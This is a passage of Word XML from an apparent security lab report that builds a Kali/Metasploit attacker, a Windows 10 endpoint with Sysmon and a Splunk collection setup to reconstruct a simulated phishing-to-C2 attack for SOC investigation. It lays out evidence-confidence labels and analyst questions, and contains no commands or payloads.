        <w:jc w:val="both"/>
      </w:pP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3"/>
        <w:gridCol w:w="3383"/>
        <w:gridCol w:w="3383"/>
      </w:tblGrid>
      <w:tr w14:paraId="4F7D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0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="509B51BA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7DD94F0A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Evidence class</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CCCFD76">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="3C5F28B0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="000F107D">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Use in this report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="34DFB673">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="682B59A0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Confidence rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="730D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8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="1C938382">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6EDBAB6C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Observed in supplied scenario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D3E1961">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="22E73003">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Directly described in the video/transcript and user scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6C8129B6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BBFC6C7">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Label as CONFIRMED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="76BD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FFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3FE3E792">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="467226C6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Expected endpoint artifact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50FC788A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1990B637">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A log event that should exist if the action occurred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="56C61EA8">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="717C3E69">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Label as EXPECTED; verify in the lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1CFE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8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4337D53F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D1A1B0F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Scenario extension</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE36124">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="78554333">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Added to model a full phishing-to-detection chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="5191E827">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="486BEB4D">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Label as SCENARIO EXTENSION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2525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FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2BB73E6E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6693DE35">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Conditional technique</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D740250">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="706762D1">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Technique depends on a specific sub-action not demonstrated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1888E85B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C9A2ACF">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Label as CONDITIONAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="157D5519">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2028E3B9">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A senior SOC analyst should be able to answer five questions from the final evidence: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B0F25A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Where did execution start? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67668C0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What process produced C2? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C6B6CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What child processes followed? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D20182D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Which changes created persistence? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB53F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Which indicators can be hunted across the environment?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C378D77">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6426200" cy="3021965"/>
            <wp:effectExtent l="0" t="0" r="1270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426200" cy="3021965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607F3DB">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>03 / ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228A53B5">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Lab Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E6D99D">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A collection-first design: generate evidence at the endpoint, centralize it, then reconstruct the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB86DB3">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6437630" cy="305181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0"/>
                    <a:srcRect t="14681"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6437630" cy="3051810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1017DC5B">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Figure 2. Recommended lab architecture and evidence flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FD72AC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Forensic and Monitoring Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9EDEA">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> acts as the attacker-side system. Its Metasploit and system logs can optionally be forwarded to the same Splunk instance to support correlation with Windows endpoint activity and build a complete attack timeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE95732">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> serves as the primary forensic endpoint, where the simulated attack is executed and investigated. Sysmon records detailed telemetry in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Microsoft-Windows-Sysmon/Operational</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> channel, including process creation, network connections, file activity, process access, and other security-relevant events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2EAEB1">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="80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The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Splunk Universal Forwarder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> installed on Windows 10 collects the relevant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sysmon and Windows Security logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and forwards them to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Splunk Enterprise on Windows 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for centralized monitoring, correlation, and investigation.</w:t>
      </w:r>
    </w:p>
